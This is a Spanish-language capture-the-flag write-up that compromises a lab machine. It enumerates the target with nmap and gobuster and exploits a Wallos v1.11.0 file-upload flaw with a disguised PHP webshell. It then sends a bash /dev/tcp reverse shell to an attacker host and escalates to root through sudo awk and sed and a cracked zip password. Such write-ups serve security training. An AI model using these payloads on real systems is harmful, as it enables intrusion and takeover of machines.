# Enumeracion de Puertos, Servicios y Versiones

nmap -Pn -n -sS -p- -sV --script 'vuln' --open --min-rate 5000 -vvv 172.17.0.2 -oN nmap

80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.59 ((Debian))
| http-sql-injection: 
|   Possible sqli for queries:
|     http://172.17.0.2:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http-enum: 
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.59 (debian)'
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.59 (debian)'
|_  /js/: Potentially interesting directory w/ listing on 'apache/2.4.59 (debian)'


# Fuzzing Web 

gobuster dir -u http://172.17.0.2 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -t 50 -x php,txt,html,py,js,png,jpg

===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 275]
/.php                 (Status: 403) [Size: 275]
/images               (Status: 301) [Size: 309] [--> http://172.17.0.2/images/]
/index.html           (Status: 200) [Size: 7022]
/css                  (Status: 301) [Size: 306] [--> http://172.17.0.2/css/]
/js                   (Status: 301) [Size: 305] [--> http://172.17.0.2/js/]
/.html                (Status: 403) [Size: 275]
/.php                 (Status: 403) [Size: 275]
/server-status        (Status: 403) [Size: 275]
Progress: 1661144 / 1661152 (100.00%)
===============================================================

chequeando el servicio web en index.html, al clikcar sobre >> Get A Quote <<
la url coloca: http://panel.wallet.dl/, por lo que vamos agregarlo a /etc/hosts

ya agregado panel.wallet.dl a /etc/hosts, recargamos la web y nos salta un formulario
de registro, url: http://panel.wallet.dl/registration.php

volvemos hacer fuzzing

gobuster dir -u http://panel.wallet.dl -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -t 50 
-x php,txt,html,py,js,png,jpg -b 404

===============================================================
/images               (Status: 301) [Size: 319] [--> http://panel.wallet.dl/images/]
/.php                 (Status: 403) [Size: 280]
/index.php            (Status: 302) [Size: 0] [--> login.php]
/.html                (Status: 403) [Size: 280]
/about.php            (Status: 302) [Size: 0] [--> login.php]
/login.php            (Status: 200) [Size: 1924]
/logos.php            (Status: 200) [Size: 1977]
/stats.php            (Status: 302) [Size: 0] [--> login.php]
/screenshots          (Status: 301) [Size: 324] [--> http://panel.wallet.dl/screenshots/]
/scripts              (Status: 301) [Size: 320] [--> http://panel.wallet.dl/scripts/]
/registration.php     (Status: 302) [Size: 0] [--> login.php]
/includes             (Status: 301) [Size: 321] [--> http://panel.wallet.dl/includes/]
/db                   (Status: 301) [Size: 315] [--> http://panel.wallet.dl/db/]
/logout.php           (Status: 302) [Size: 0] [--> .]
/styles               (Status: 301) [Size: 319] [--> http://panel.wallet.dl/styles/]
/settings.php         (Status: 302) [Size: 0] [--> login.php]
/auth.php             (Status: 200) [Size: 0]
/libs                 (Status: 301) [Size: 317] [--> http://panel.wallet.dl/libs/]
/.html                (Status: 403) [Size: 280]
/.php                 (Status: 403) [Size: 280]
/server-status        (Status: 403) [Size: 280]
Progress: 1661144 / 1661152 (100.00%)
===============================================================

volvemos a la web, donde nos aparecio el panel de registro y nos registrarmos en el sistema, si nos vamos
al menu que se encuentra al lado de nuestro username, veremos >> acerca de << y al acceder alli tenemos
la siguiente informacion:

------------------------------------------------------------------------------------------------------------------------
Acerca de y Créditos

Wallos v1.11.0
Licencia: GPLv3
Problemas y Solicitudes: GitHub
El autor: https://henrique.pt
Iconos: https://www.streamlinehq.com/freebies/plump-flat-free
Iconos de Pago: https://www.figma.com/file/5IMW8JfoXfB5GRlPNdTyeg/Credit-Cards-and-Payment-Methods-Icons-(Community)
Chart.js: https://www.chartjs.org/
-------------------------------------------------------------------------------------------------------------------------

y aqui nos interesa es >> wallos v1.11.0 asi que buscamos un exploit (en mi caso lo hice con searchsploit desde consola)

searchsploit wallos 1.11.0

-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                        |  Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Wallos < 1.11.2 - File Upload RCE                                                                                                     | php/webapps/51924.txt
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------

y nos conseguimos con una POC, asi que lo primero que hare sera localizarla y leer su contenido para saber como explotar
el File Upload RCE

find / -name 51924.txt						| localizamos el archivo en nuestro sistema
/usr/share/exploitdb/exploits/php/webapps/51924.txt		| ruta
nano /usr/share/exploitdb/exploits/php/webapps/51924.txt	| leemos la documentacion

el procedimiento consiste en crear una nueva suscripccion, y cargar un codigo malicioso php.

1) nos vamos a http://panel.wallet.dl/ (ya iniciado session)
2) pinchamos en crear nueva suscripccion

en este punto rellevamos todos los campos pero donde indique cargar logotipo 
es donde vamos a cargar nuestro codigo php..
yo me cargue el mismo php de la POC

-----------------------
<?php
system($_GET['cmd']);
?>
-----------------------

ya llenado todos los campos y cargado el archivo php a traves de >> cargar logotipo
vamos abrir burpsuite y capturar la peticion... una vez capturada, la mandamos al repiter
y vamos a editar la peticion como indica la POC:

Haga la Solicitud cambiando el Tipo de Contenido a imagen/jpeg y agregando "GIF89a", 
debería ser como:

--------------------------------------------------------------------------
Content-Disposition: form-data; name="logo"; filename="code.php"
Content-Type: image/jpeg

GIF89a;

<?php
	echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
?>
---------------------------------------------------------------------------

Recibirá la respuesta de que su archivo se cargó correctamente:

{"status":"Success","message":"Suscripci\u00f3n a\u00f1adida con \u00e9xito"}


Su archivo estará ubicado en:
http://VICTIM_IP/images/uploads/logos/XXXXXX-yourshell.php

asi que adaptando esa url a mi caso, quedaria asi:

http://http://panel.wallet.dl/images/uploads/logos/

y tras validar la url anterior me consigo con mi archivo php: 1725947713-RCE.php
asi que ahora comienzo a ejecutar codigo desde la url del navegador de la siguiente
forma:

http://http://panel.wallet.dl/images/uploads/logos/1725947713-RCE.php?cmd=whoami

y ya tengo ejecucion remota de comandos, me pondre en escucha por netcat
para enviarme una reverse shell

nc -lvnp 443

ahora enviamos la reverse shell

http://http://panel.wallet.dl/images/uploads/logos/1725947713-RCE.php?cmd=bash -i >& /dev/tcp/172.17.0.1/443 0>&1

asi se ve originalmente, pero para que esta reverse shell funcione debemos urlencodear: bash -i >& /dev/tcp/172.17.0.1/443 0>&1
asi que nos vamos al apartado de encoder de burpsuite y urlencodeamos:

bash -c "bash -i >& /dev/tcp/172.17.0.1/443 0>&1"

por lo que la reverse shell la terminamos enviando de la siguiete forma por el navegador:

http://panel.wallet.dl/images/uploads/logos/1725947713-RCE.php?cmd=%62%61%73%68%20%2d%63%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%37%32%2e%31%37%2e%30%2e%31%2f%34%34%33%20%30%3e%26%31%22

y tras enviar la reverse shell nos vamos a netcat donde estabamos en escucha por el puerto 443
y vemos que ya estamos dentro del sistema

# Escalada

script /dev/null -c bash 
stty raw -echo; fg
reset xterm
stty rows 38 columns 168
export TERM=xterm
export SHELL=bash
sudo -l

User www-data may run the following commands on b8aa33c02035:
    (pylon) NOPASSWD: /usr/bin/awk

sudo -u pylon /usr/bin/awk 'BEGIN {system("/bin/bash")}'

-----------------------------
ahora somos el usuario pylon|
-----------------------------

cd ~
ls
secretitotraviesito.zip

intente descomprimir pero requiere password, intente levantar un server python pero no 
esta instalado, intente copiarlo en un directorio de apache pero tampoco pude por permisos
asi que ahora:

chmod ugo+rwx secretitotraviesito.zip				| damos permisos a los demas usuarios
cp secretitotraviesito.zip /tmp					| lo copiamos en /tmp
exit								| volvemos al usuario www-data
cp /tmp/secretitotraviesito.zip .				| lo copiamos en el mismo directorio donde cargamos el archivo php
sudo -u pylon /usr/bin/awk 'BEGIN {system("/bin/bash")}'	| volvemos escalar al usuario pylon

----------------------------------------

nos vamos al navegador a la url: http://panel.wallet.dl/images/uploads/logos/
donde vamos observar el archivo comprimido secretitotraviesito.zip
por lo que lo descargamos para intentar crackear la password

zip2john secretitotraviesito.zip > hashzip
john --wordlist=/home/darks/Desktop/Kali/diccionarios/rockyou.txt hashzip
chocolate1       (secretitotraviesito.zip/notitachingona.txt)     

unzip secretitotraviesito.zip 
pass: chocolate1
  inflating: notitachingona.txt					| archivo descomprimido
cat notitachingona.txt      
pinguino:pinguinomaloteh

tenemos lo que parecen ser credenciales, asi que nos vamos a la instancia de la maquina vulnerada
y chequeamos los usuarios del sistema

cat /etc/passwd |grep sh
root:x:0:0:root:/root:/bin/bash
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
pylon:x:1000:1000:pylon,,,:/home/pylon:/bin/bash
pinguino:x:1001:1001:pinguino,,,:/home/pinguino:/bin/bash

y por lo visto lo que conseguimos si eran credenciales asi que escalamos al usuario pinguino

su pinguino
pass: pinguinomaloteh

------------------------------
ahora somos el user: pinguino|
------------------------------

sudo -l
User pinguino may run the following commands on b8aa33c02035:
    (ALL) NOPASSWD: /usr/bin/sed

sudo /usr/bin/sed -n '1e exec bash 1>&0' /etc/hosts
#root
